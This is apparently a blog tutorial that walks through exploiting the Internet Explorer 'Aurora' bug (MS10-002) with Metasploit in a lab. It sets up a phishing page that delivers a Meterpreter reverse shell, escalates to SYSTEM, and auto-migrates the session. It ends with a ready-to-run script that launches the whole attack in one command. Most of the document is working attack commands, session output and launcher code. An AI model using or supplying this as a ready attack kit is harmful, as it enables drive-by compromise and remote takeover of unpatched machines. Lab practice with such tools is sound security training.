MS10-002 (the "Aurora" vulnerability) exploitation steps: building a phishing site with MSF
Contents
- 1. The MS10-002 Aurora vulnerability
- 2. Advanced options
1. The MS10-002 Aurora vulnerability
This post is a short walkthrough of using Metasploit to test MS10-002 (the Internet Explorer "Aurora" memory-corruption bug) against a lab machine. For learning purposes only.

| Test environment | Description | IP |
|---|---|---|
| Attacker host | Kali 2020 | 192.168.1.113 |
| Target host | Windows XP SP3 | 192.168.1.106 |

① Start msfconsole, search for ms10_002, select the browser exploit module, and set its options. The defaults are changed so the phishing site listens on port 80 at the site root (no random URI to type) and the Meterpreter handler listens on 443; both ports are below 1024, so msfconsole needs root for this.
```
msf6 > search ms10_002

Matching Modules
================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  exploit/windows/browser/ms10_002_aurora     2010-01-14       normal  No     MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
   1  exploit/windows/browser/ms10_002_ie_object  2010-01-21       normal  No     MS10-002 Microsoft Internet Explorer Object Memory Use-After-Free


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/browser/ms10_002_ie_object

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/browser/ms10_002_aurora) > options

Module options (exploit/windows/browser/ms10_002_aurora):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.1.113    yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/browser/ms10_002_aurora) > set srvport 80
srvport => 80
msf6 exploit(windows/browser/ms10_002_aurora) > set lport 443
lport => 443
msf6 exploit(windows/browser/ms10_002_aurora) > set uripath /
uripath => /
msf6 exploit(windows/browser/ms10_002_aurora) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 192.168.1.113:443
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.1.113:80/
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
```
② The output shows the phishing site is now listening on port 80 of the attacker host. On the target machine, open Internet Explorer and browse to http://192.168.1.113/ (the address printed in the Local IP line; with URIPATH set to / the site root itself serves the exploit page). The "Using URL: http://0.0.0.0:80/" line is only the bind address, not a link a victim can use; set SRVHOST to the interface address if you want the printed URL to be the real one.
③ The attacker host gets a Meterpreter session on the target. Note in the output below that the module sends its exploit page to every client that requests it: 192.168.1.109, another machine on the lab network, was served the page four times and never called back, while 192.168.1.106 (the XP target) received the page once, pulled the Meterpreter stage, and opened a session. A session only follows when the client is a vulnerable Internet Explorer.
```
msf6 exploit(windows/browser/ms10_002_aurora) > [*] Server started.
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.109    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] 192.168.1.106    ms10_002_aurora - Sending MS10-002 Microsoft Internet Explorer "Aurora" Memory Corruption
[*] Sending stage (175174 bytes) to 192.168.1.106
[*] Meterpreter session 1 opened (192.168.1.113:443 -> 192.168.1.106:4278) at 2021-06-07 13:25:17 +0800

msf6 exploit(windows/browser/ms10_002_aurora) > sessions

Active sessions
===============

  Id  Name  Type                     Information             Connection
  --  ----  ----                     -----------             ----------
  1         meterpreter x86/windows  WINXP-1\st21 @ WINXP-1  192.168.1.113:443 -> 192.168.1.106:4278 (192.168.1.106)

msf6 exploit(windows/browser/ms10_002_aurora) > sessions 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP-1\st21
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
```
getuid reports the account that was browsing, because the payload runs inside that user's iexplore.exe. getsystem's technique 1 (the "/Admin" in its name says so) needs an administrative token, which is why it succeeds here: the XP user st21 is a local administrator. On a target where the browsing user is not an administrator, getsystem fails and a separate privilege-escalation step is needed.
2. Advanced options
Use advanced (or show advanced) to list the module's and payload's advanced options:
```
msf6 exploit(windows/browser/ms10_002_aurora) > advanced

Module advanced options (exploit/windows/browser/ms10_002_aurora):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module


Payload advanced options (windows/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadBindPort                               no        Port to bind reverse tcp socket to on target system.
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependMigrate               false            yes       Spawns and runs shellcode in new process
   PrependMigrateProc                            no        Process to spawn and run shellcode in
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module
```
For example, to migrate into another process as soon as the session opens, so the shell is not lost when Internet Explorer crashes or the user closes it (the payload initially lives inside the exploited iexplore.exe):
```
msf6 exploit(windows/browser/ms10_002_aurora) > set autorunscript migrate -f
autorunscript => migrate -f
```
This must be set before exploit, since AutoRunScript is read when the session is created. PrependMigrate (listed above) achieves the same from the payload side, spawning a new process for the shellcode before the stager even connects back.
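Typing the steps of sections 1 and 2 by hand each time is error-prone (the listener and web server ports must not collide, and the AutoRunScript has to be set before exploit). The script below, an added example that is not code from the original post, writes the same configuration as an msfconsole resource file and launches it in one command. The IP addresses are the ones from the lab table on this page; the resource file path, the environment-variable overrides and the AURORA_LAUNCH switch are this script's own conventions. SRVHOST is pinned to the interface address instead of 0.0.0.0 so that the "Using URL" line printed by the module is a link the victim can actually open.

```shell
#!/bin/sh
# Added example (not from the original post): drive the msfconsole steps shown
# above from a resource script. Addresses come from the lab table on this page;
# the file path and the AURORA_LAUNCH switch are assumptions of this script.
set -eu

ATTACKER_IP="${ATTACKER_IP:-192.168.1.113}"   # Kali host from the lab table
SRV_PORT="${SRV_PORT:-80}"                    # port the phishing site listens on
HANDLER_PORT="${HANDLER_PORT:-443}"           # port the reverse_tcp handler listens on

# The web server and the payload handler are two listeners on the same host,
# so they must not be given the same port.
check_ports() {
    [ "$SRV_PORT" != "$HANDLER_PORT" ]
}

# Write the resource file. Each line is what the post types by hand, plus the
# AutoRunScript from section 2 so the session leaves iexplore.exe as soon as
# it opens. Lines starting with # are ignored by msfconsole -r.
write_aurora_rc() {
    rc_path="$1"
    cat > "$rc_path" <<EOF
use exploit/windows/browser/ms10_002_aurora
set payload windows/meterpreter/reverse_tcp
set SRVHOST ${ATTACKER_IP}
set SRVPORT ${SRV_PORT}
set URIPATH /
set LHOST ${ATTACKER_IP}
set LPORT ${HANDLER_PORT}
set AutoRunScript migrate -f
exploit -j
EOF
    printf '%s\n' "$rc_path"
}

check_ports || { echo "SRVPORT and LPORT must differ" >&2; exit 1; }
RC_FILE="$(write_aurora_rc "$(mktemp "${TMPDIR:-/tmp}/aurora.XXXXXX")")"

# Ports below 1024 need root. Set AURORA_LAUNCH=1 to start msfconsole at once;
# otherwise only print the command so the resource file can be reviewed first.
if [ "${AURORA_LAUNCH:-0}" = "1" ]; then
    exec msfconsole -q -r "$RC_FILE"
else
    echo "resource file written to $RC_FILE; run: sudo msfconsole -q -r $RC_FILE"
fi
```

Run it once without AURORA_LAUNCH to inspect the generated file, then `sudo AURORA_LAUNCH=1 sh aurora.sh` to bring up the server and handler; `exploit -j` keeps the module running as a background job exactly as in the walkthrough, so the console stays free for sessions and sessions 1.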